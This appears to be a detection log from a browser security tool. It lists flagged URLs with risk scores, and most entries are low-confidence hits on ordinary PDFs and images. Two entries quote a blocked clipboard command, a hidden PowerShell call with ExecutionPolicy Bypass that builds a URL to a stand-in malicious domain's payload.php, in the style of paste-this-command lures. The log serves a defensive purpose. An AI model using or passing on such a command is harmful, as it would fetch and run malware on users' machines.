| 2026-09-11T10:19:37+00:00 |
manual.bandai-hobby.net |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: 4200.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: manual.bandai-hobby.net" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions meta but host is manual.bandai-hobby.net." Confidence score: 10/100 |
pending |
| 2026-09-10T17:03:47+00:00 |
octoenergy-production-user-documents.s3.amazonaws.com |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/xml)" Detected snippet: "Filename: A-B1D54FE3-441882812-1.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: octoenergy-production-user-documents.s3.amazonaws.com" Detected snippet: "Runtime verdict: low (14/100)" Detected snippet: "Models URL:14 Content:0 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Very long subdomain label." Detected snippet: "Runtime reason: Domain has multiple hyphens." Confidence score: 14/100 |
pending |
| 2026-09-10T11:08:57+00:00 |
ginermairena.es |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: CIRCULAR-PRINCIPIO-DE-CURSO-26-27-1.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: ginermairena.es" Detected snippet: "Runtime verdict: low (0/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:0" Confidence score: $1/100 |
pending |
| 2026-09-06T16:57:41+00:00 |
camo.githubusercontent.com |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (image/png)" Detected snippet: "Filename: 68747470733a2f2f692e696d6775722e636f6d2f78447a574b55552e706e67" Detected snippet: "Unfamiliar download host: camo.githubusercontent.com" Detected snippet: "Runtime verdict: low (0/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:0" Confidence score: 16/100 |
pending |
| 2026-09-04T09:57:50+00:00 |
www.clubfernandovarela.es |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: nombramiento_juntadirectiva-1.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: www.clubfernandovarela.es" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions meta but host is www.clubfernandovarela.es." Confidence score: 10/100 |
pending |
| 2026-09-04T02:16:12+00:00 |
www.google.com |
REINCIDENTE DOM x9 |
Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "C:\WINDOWS\system32\cmd.exe /min /c powershell -NoP -ExecutionPolicy Bypass -w 1 -c "$p1='https://example-malicious-domain';$p2='/payload.php';$af=$p1+$p2; $..." Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "C:\WINDOWS\system32\cmd.exe /min /c powershell -NoP -ExecutionPolicy Bypass -w 1 -c "$p1='https://example-malicious-domain';$p2='/payload.php';$af=$p1+$p2; $..." Confidence score: 58/100 |
pending |
| 2026-09-04T02:16:11+00:00 |
www.google.com |
REINCIDENTE DOM x9 |
Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "C:\WINDOWS\system32\cmd.exe /min /c powershell -NoP -ExecutionPolicy Bypass -w 1 -c "$p1='https://example-malicious-domain';$p2='/payload.php';$af=$p1+$p2; $..." Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "C:\WINDOWS\system32\cmd.exe /min /c powershell -NoP -ExecutionPolicy Bypass -w 1 -c "$p1='https://example-malicious-domain';$p2='/payload.php';$af=$p1+$p2; $..." Confidence score: 52/100 |
pending |
| 2026-09-02T12:31:29+00:00 |
manual.bandai-hobby.net |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: 4200.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: manual.bandai-hobby.net" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions meta but host is manual.bandai-hobby.net." Confidence score: 16/100 |
pending |
| 2026-09-02T10:23:06+00:00 |
cdn.prod.website-files.com |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: 69d8bb5aea59e31efb3b8a7f_Tech_Report_ai_breach_mex_gov.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: cdn.prod.website-files.com" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions google but host is cdn.prod.website-files.com." Confidence score: 16/100 |
pending |
| 2026-08-28T10:38:20+00:00 |
ceiplasportadas.es |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: INFORMACION_COMEDOR_25-26.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: ceiplasportadas.es" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions meta but host is ceiplasportadas.es." Confidence score: 16/100 |
pending |
| 2026-08-26T14:33:14+00:00 |
octoenergy-production-user-documents.s3.amazonaws.com |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/xml)" Detected snippet: "Filename: A-B1D54FE3-441882812-1.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: octoenergy-production-user-documents.s3.amazonaws.com" Detected snippet: "Runtime verdict: low (14/100)" Detected snippet: "Models URL:14 Content:0 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Very long subdomain label." Detected snippet: "Runtime reason: Domain has multiple hyphens." Confidence score: 16/100 |
pending |
| 2026-08-26T14:18:19+00:00 |
octoenergy-production-user-documents.s3.amazonaws.com |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/xml)" Detected snippet: "Filename: A-B1D54FE3-441882812-1.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: octoenergy-production-user-documents.s3.amazonaws.com" Detected snippet: "Runtime verdict: low (14/100)" Detected snippet: "Models URL:14 Content:0 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Very long subdomain label." Detected snippet: "Runtime reason: Domain has multiple hyphens." Confidence score: 16/100 |
pending |
| 2026-08-26T09:38:33+00:00 |
melampobandas.es |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: 1787732042_ESPA%C3%91A%20CA%C3%91%C3%8D-%20%20PARTICHELAS.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: melampobandas.es" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions meta but host is melampobandas.es." Confidence score: 10/100 |
pending |
| 2026-08-20T13:39:30+00:00 |
portal.edu.gva.es |
- |
S'ha detectat contingut d'ordres ofuscat o codificat. Fragment detectat: "Non-HTML content probe (application/pdf)" Fragment detectat: "Filename: Curriculum-2n-Batxillerat-1.pdf" Fragment detectat: "Extension: .pdf" Fragment detectat: "Unfamiliar download host: portal.edu.gva.es" Fragment detectat: "Runtime verdict: low (10/100)" Fragment detectat: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Fragment detectat: "Runtime reason: Brand mismatch: mentions meta but host is portal.edu.gva.es." Puntuació de confiança: 16/100 |
pending |
| 2026-08-18T12:13:46+00:00 |
buildinstructions.com |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: Captain-In-Terminator-Armour-HQ.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: buildinstructions.com" Detected snippet: "Runtime verdict: low (0/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:0" Confidence score: 9/100 |
pending |
| 2026-08-18T11:13:59+00:00 |
rsisinternational.org |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: 2330-2347.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: rsisinternational.org" Detected snippet: "Runtime verdict: low (0/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:0" Confidence score: 16/100 |
pending |
| 2026-08-14T15:16:44+00:00 |
www.proofpoint.com |
- |
Se detectó contenido de comandos ofuscado o codificado. Fragmento detectado: "Non-HTML content probe (application/pdf)" Fragmento detectado: "Filename: pfpt-data-sheets-es-ds-dspm.pdf" Fragmento detectado: "Extension: .pdf" Fragmento detectado: "Unfamiliar download host: www.proofpoint.com" Fragmento detectado: "Runtime verdict: low (10/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Fragmento detectado: "Runtime reason: Brand mismatch: mentions meta but host is www.proofpoint.com." Puntuación de confianza: 16/100 |
pending |
| 2026-08-06T10:25:04+00:00 |
buildinstructions.com |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: Primaris-Gladiator-Valiant-or-Reaper-or-Lancer-HQ.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: buildinstructions.com" Detected snippet: "Runtime verdict: low (0/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:0" Confidence score: 8/100 |
pending |
| 2026-08-02T07:17:56+00:00 |
atom.petworthsociety.co.uk |
- |
Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: June_2012_No_148.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: atom.petworthsociety.co.uk" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions meta but host is atom.petworthsociety.co.uk." Confidence score: 16/100 |
pending |
| 2026-07-30T11:37:52+00:00 |
drive.google.com |
- |
Suspicious command detected in the clipboard. Suspicious command pattern detected. Obfuscated or encoded command content detected. Detected snippet: "https://drive.google.com/drive/folders/1TaMK4nFBeePlkmb07urdqoBSWe5o7JVJ?usp=sharing" Detected snippet: "Runtime verdict: low (23/100)" Detected snippet: "Models URL:0 Content:23 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Obfuscation/evasion pattern found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "https://drive.google.com/drive/folders/1TaMK4nFBeePlkmb07urdqoBSWe5o7JVJ?usp=sharing" Confidence score: 52/100 |
pending |